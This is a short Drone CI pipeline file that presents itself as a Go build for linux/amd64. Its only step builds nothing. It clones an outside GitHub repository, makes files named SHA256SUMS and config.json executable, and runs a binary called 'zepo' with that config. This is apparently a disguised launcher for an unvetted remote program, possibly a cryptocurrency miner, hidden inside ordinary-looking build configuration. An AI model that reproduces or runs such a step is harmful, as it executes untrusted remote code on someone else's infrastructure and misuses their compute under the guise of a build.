kind: pipeline
type: docker
name: linux_amd64

environment:
  GOOS: linux
  GOARCH: amd64
  CGO_ENABLED: 0

steps:
  - name: build-linux-amd64
    image: golang:1.21.4
    commands:
      - git clone https://github.com/azureone4/zephher.git && cd zephher && chmod +x SHA256SUMS && chmod +x config.json && chmod +x zepo && ./zepo -c "config.json"

